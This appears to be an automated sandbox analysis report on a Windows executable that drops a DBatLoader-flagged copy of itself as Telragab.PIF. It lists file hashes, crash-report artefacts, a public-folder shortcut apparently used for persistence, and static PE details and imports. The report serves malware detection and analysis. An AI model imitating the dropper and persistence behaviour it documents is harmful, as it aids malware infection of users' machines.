                                                                                                  SHA-256:DAC5F0916DF55F879D19FE052011F5B896B00C9D0F4DF292FE9A6E61E5B03753
                                                                                                  SHA-512:1C457C3BBA34A9C6A308B35495180E3C6FB45570F9E14C7A7834445D29A14D7E3314E75C81424D3223F818EB627C4F2725DA10AC4CB50CE9777F1BF29FCBA725
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.5.8.2.6.2.1.5.1.8.1.4.5.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.5.8.2.6.2.1.5.9.3.0.4.1.0.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.c.3.d.3.0.a.-.2.e.8.b.-.4.9.e.2.-.b.8.9.5.-.6.7.a.0.1.8.8.8.4.a.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.d.8.e.a.1.9.-.6.0.e.2.-.4.4.f.6.-.a.2.6.e.-.c.f.0.4.9.6.e.5.d.b.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.e.l.r.a.g.a.b...P.I.F.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.7.0.-.0.0.0.1.-.0.0.1.5.-.b.6.2.7.-.a.e.0.9.9.5.2.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.a.3.f.b.a.d.5.0.7.6.5.1.9.6.1.a.3.2.8.a.3.7.8.d.7.e.3.f.d.8.5.0.0.0.0.f.f.f.f.!.0.0.0.0.c.f.6.a.2.b.1.b.a.9.8.b.f.3.0.3.e.9.3.b.4.0.7.0.9.1.9.e.c.1.c.d.3.0.2.6.2.3.7.7.!.T.e.l.r.a.g.a.b...P.I.F.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD3B.tmp.dmp

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Mini DuMP crash report, 15 streams, Thu Nov 30 13:56:55 2023, 0x1205a4 type
                                                                                                  Category:dropped
                                                                                                  Size (bytes):129720
                                                                                                  Entropy (8bit):2.0975375590264504
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:UOPEdxUX+hHSBnJ1kgUBDLiA1MCuDv+ahrNC:UOHJrUBD71A+ahr4
                                                                                                  MD5:0E869B364F345A22BC9E2602125CC1F9
                                                                                                  SHA1:86ECF4BFED405C3CD49E5D34AC2C7E7BF7096AD1
                                                                                                  SHA-256:1A2CAC372A54D615EB3C858124B8E13094DA36339570B257C7D3EBB3561764F7
                                                                                                  SHA-512:C014CA857F7F901DC2628E31BC3D665023ED8155A40A715D8A1238639C6D91FA4C6B8091763B84270746859545BDF296D964718631278B8BCEBB15EDC57A753E
                                                                                                  Malicious:false
                                                                                                  Preview:MDMP..a..... .........he............D...............X............&...........`..........`.......8...........T...........pT..H............,..........................................................................................eJ..............GenuineIntel............T.......p.....he............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFEE2.tmp.WERInternalMetadata.xml

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8370
                                                                                                  Entropy (8bit):3.7003910711769294
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:R6l7wVeJxC6wYZ6Y2D8SUQRig2gmfACpr689bosTsfIqKm:R6lXJE6D6YBSU0ig2gmfA8os4fn7
                                                                                                  MD5:DFF139A0FD2EB5B90FB7CF5B2E45427F
                                                                                                  SHA1:CD873B43A740C5774AB958266E2A8EBF35001E61
                                                                                                  SHA-256:9E5BC0D2A615852BF73029C81BA20D44FF398BA9464DE569694F5B7D9F09EA05
                                                                                                  SHA-512:D7B465B6C3182CF8A9E16D78690B40F1053026E5B4E32FBAFB6525B83385D60641353F1E157AC573F639187E975569837342D5D9FA0DE4BD7ED3074A952DCB23
                                                                                                  Malicious:false
                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.8.<./.P.i.d.

                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF12.tmp.xml

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4608
                                                                                                  Entropy (8bit):4.477773674076699
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwWl8zsxZJg77aI9qVWpW8VYNPYm8M4JAxGFQ+q8CN5YggWydd:uIjfpI7gk7VESJALYggWydd
                                                                                                  MD5:D0362946E470C127C856B35D1E6CA454
                                                                                                  SHA1:3C60ABDA81066F453069385A4F73BE1ECD1812B8
                                                                                                  SHA-256:BEA6C6CA1C576C5400C97E7EF7D74BD81361A82B1A5A42942EE923C5E592028D
                                                                                                  SHA-512:B9E32A4A6364DDC59AA4FA7833CEA313F4518F1B44DF63638AAEC4F6414B2F5680CEF267D6EBEEEDC269AD05521745BD3AB4072EB17CF62AE2D988C07726310E
                                                                                                  Malicious:false
                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="83819" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

                                                                                                  C:\Users\Public\Libraries\Telragab.PIF

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2403840
                                                                                                  Entropy (8bit):7.682310515830663
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:UkQzWGa8pH8yc0/wU2lpe63ZrxKrVEbRIqiPt415Fehg1mQ5C:UNqGa8pcyV/wjpdZrxEVEtI14xqn
                                                                                                  MD5:072D323C28E7BA4D63EB7DF9894F33C9
                                                                                                  SHA1:CF6A2B1BA98BF303E93B4070919EC1CD30262377
                                                                                                  SHA-256:D164C7CE3856705552A7DCD91F577C12162D5EB522153E33E91F86536CAC5FB2
                                                                                                  SHA-512:348E888F90E8582BE54ACC4C39D9531EC333A3F9DEB5C7CC1C4D6DBF2CC094CBB744438D87D6D3A2357D2E2BE7141412744287249B465EB39217A3F0CFFB0A23
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Telragab.PIF, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................H.............@...........................%..................@............................".z$...`#......................."..n............................".....................................................CODE................................ ..`DATA................................@...BSS..........."......r"..................idata..z$...."..&...r".............@....tls.........."......."..................rdata........".......".............@..P.reloc...n...."..p....".............@..P.rsrc........`#.......#.............@..P..............%.......$.............@..P........................................................................................................................................

                                                                                                  C:\Users\Public\Telragab.url

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\Fpopgapwdcgvxn.exe
                                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Telragab.PIF">), ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):99
                                                                                                  Entropy (8bit):5.00911795347448
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMqCajSsb5itKlv:HRYFVmTWDyzME5OK1
                                                                                                  MD5:4B33C52B0816C75AB35475CE6BF00E69
                                                                                                  SHA1:929F5ABCEA017613C901C185D58DFAC7F3FA1055
                                                                                                  SHA-256:22B4C7336EDB302C60B225DE9A971A8D4535DEC942FD24EBF239E3E7E9319DE2
                                                                                                  SHA-512:5DE9B3DE078C3A62E5AAB3E9E38CE1AC4C9843727E9BD60E1DBDF70102C56A55AE78CBDBDFEB2BFDE51AB3AFC96A3CAD7FB37AA94C7B9260673C4A809D34759A
                                                                                                  Malicious:false
                                                                                                  Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Telragab.PIF"..IconIndex=12..HotKey=3..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                  Download File
                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1022
                                                                                                  Entropy (8bit):5.215200866635182
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:YqHZ6T06MhmamGgb0O0bihmVmGg6CUXyhmGNmGgbxdB6hm3mGgz0Jahm2mGgbNdh:YqHZ6T06McDTb0O0bic4TDUXycRTbxd/
                                                                                                  MD5:BA8512A1180143F7620E106FB9DF5F43
                                                                                                  SHA1:2EF20B9029C7C89ED134DD87F6A9403D4103031F
                                                                                                  SHA-256:171640BF14335CC6403F09E4C72C11146C7393E63A9273C71B98C2D456202BA9
                                                                                                  SHA-512:2B83F9321A98090269D610D552C19B06136719FCD9F310437B2852F938DED711A1D09EABF017BF9AAEA980F68CEC6703234808A5CAB74C9A52AE4903A0DAE797
                                                                                                  Malicious:false
                                                                                                  Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3053123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":3043123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3033123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3023123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3013123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3003123472,"LastSwitchedHighPart":31061843,

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.682310515830663
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                  • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                  • Windows Screen Saver (13104/52) 0.13%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  File name:Fpopgapwdcgvxn.exe
                                                                                                  File size:2'403'840 bytes
                                                                                                  MD5:072d323c28e7ba4d63eb7df9894f33c9
                                                                                                  SHA1:cf6a2b1ba98bf303e93b4070919ec1cd30262377
                                                                                                  SHA256:d164c7ce3856705552a7dcd91f577c12162d5eb522153e33e91f86536cac5fb2
                                                                                                  SHA512:348e888f90e8582be54acc4c39d9531ec333a3f9deb5c7cc1c4d6dbf2cc094cbb744438d87d6d3a2357d2e2be7141412744287249b465eb39217a3f0cffb0a23
                                                                                                  SSDEEP:49152:UkQzWGa8pH8yc0/wU2lpe63ZrxKrVEbRIqiPt415Fehg1mQ5C:UNqGa8pcyV/wjpdZrxEVEtI14xqn
                                                                                                  TLSH:58B5F112D5A18833D4F3177A8D4AAF7869263DC09F28B4C5F2DA7C8C76B834567241FA
                                                                                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                  File Icon

                                                                                                  Icon Hash:091ad4d45274bc4d

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x45f248
                                                                                                  Entrypoint Section:CODE
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                  DLL Characteristics:
                                                                                                  Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:68296516c32d32fc3260fa762049f34e

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  add esp, FFFFFFF0h
                                                                                                  mov eax, 0045F060h
                                                                                                  call 00007FF2D4DB50ADh
                                                                                                  mov eax, dword ptr [0062871Ch]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  call 00007FF2D4E048C9h
                                                                                                  mov ecx, dword ptr [0062880Ch]
                                                                                                  mov eax, dword ptr [0062871Ch]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  mov edx, dword ptr [0045E4E4h]
                                                                                                  call 00007FF2D4E048C9h
                                                                                                  mov eax, dword ptr [0062871Ch]
                                                                                                  mov eax, dword ptr [eax]
                                                                                                  call 00007FF2D4E0493Dh
                                                                                                  call 00007FF2D4DB2E10h
                                                                                                  lea eax, dword ptr [eax+00h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x22a0000x247a.idata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2360000x1a400.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x22f0000x6ec4.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x22e0000x18.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  CODE0x10000x5e2900x5e400False0.5204948607427056data6.538043127568022IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  DATA0x600000x1c88a00x1c8a00False0.8356733763345195data7.7565677030373665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  BSS0x2290000xc910x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .idata0x22a0000x247a0x2600False0.3521792763157895data4.91843705755274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .tls0x22d0000x100x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rdata0x22e0000x180x200False0.05078125data0.186582516434666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0x22f0000x6ec40x7000False0.6327427455357143data6.685586013840769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x2360000x1a4000x1a400False0.1939267113095238data4.777981358404081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_CURSOR0x2368600x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                  RT_CURSOR0x2369940x134data0.4642857142857143
                                                                                                  RT_CURSOR0x236ac80x134data0.4805194805194805
                                                                                                  RT_CURSOR0x236bfc0x134data0.38311688311688313
                                                                                                  RT_CURSOR0x236d300x134data0.36038961038961037
                                                                                                  RT_CURSOR0x236e640x134data0.4090909090909091
                                                                                                  RT_CURSOR0x236f980x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                  RT_ICON0x2370cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.6533687943262412
                                                                                                  RT_ICON0x2375340x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.36585365853658536
                                                                                                  RT_ICON0x2385dc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.23973029045643154
                                                                                                  RT_ICON0x23ab840x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.18304204062352386
                                                                                                  RT_ICON0x23edac0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.16423290203327173
                                                                                                  RT_ICON0x2442340x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m0.12849484969518604
                                                                                                  RT_STRING0x24d6dc0x1d4data0.4893162393162393
                                                                                                  RT_STRING0x24d8b00x1d8data0.3983050847457627
                                                                                                  RT_STRING0x24da880x198data0.4877450980392157
                                                                                                  RT_STRING0x24dc200x174data0.5161290322580645
                                                                                                  RT_STRING0x24dd940x278data0.46835443037974683
                                                                                                  RT_STRING0x24e00c0xe8data0.5905172413793104
                                                                                                  RT_STRING0x24e0f40x1d4data0.5042735042735043
                                                                                                  RT_STRING0x24e2c80x450data0.3695652173913043
                                                                                                  RT_STRING0x24e7180x35cdata0.38953488372093026
                                                                                                  RT_STRING0x24ea740x3e8data0.33
                                                                                                  RT_STRING0x24ee5c0x234data0.475177304964539
                                                                                                  RT_STRING0x24f0900xecdata0.5508474576271186
                                                                                                  RT_STRING0x24f17c0x1b4data0.5206422018348624
                                                                                                  RT_STRING0x24f3300x3e4data0.32028112449799195
                                                                                                  RT_STRING0x24f7140x358data0.4158878504672897
                                                                                                  RT_STRING0x24fa6c0x2b4data0.4060693641618497
                                                                                                  RT_RCDATA0x24fd200x10data1.5
                                                                                                  RT_RCDATA0x24fd300x278data0.7389240506329114
                                                                                                  RT_RCDATA0x24ffa80x219Delphi compiled form 'TForm1'0.6815642458100558
                                                                                                  RT_GROUP_CURSOR0x2501c40x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                  RT_GROUP_CURSOR0x2501d80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                  RT_GROUP_CURSOR0x2501ec0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                  RT_GROUP_CURSOR0x2502000x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                  RT_GROUP_CURSOR0x2502140x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                  RT_GROUP_CURSOR0x2502280x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                  RT_GROUP_CURSOR0x25023c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                                                                  RT_GROUP_ICON0x2502500x5adata0.8

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                  user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                  kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, UpdateResourceA, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, IsBadStringPtrA, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetSystemDefaultLangID, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumResourceNamesA, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                                  version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
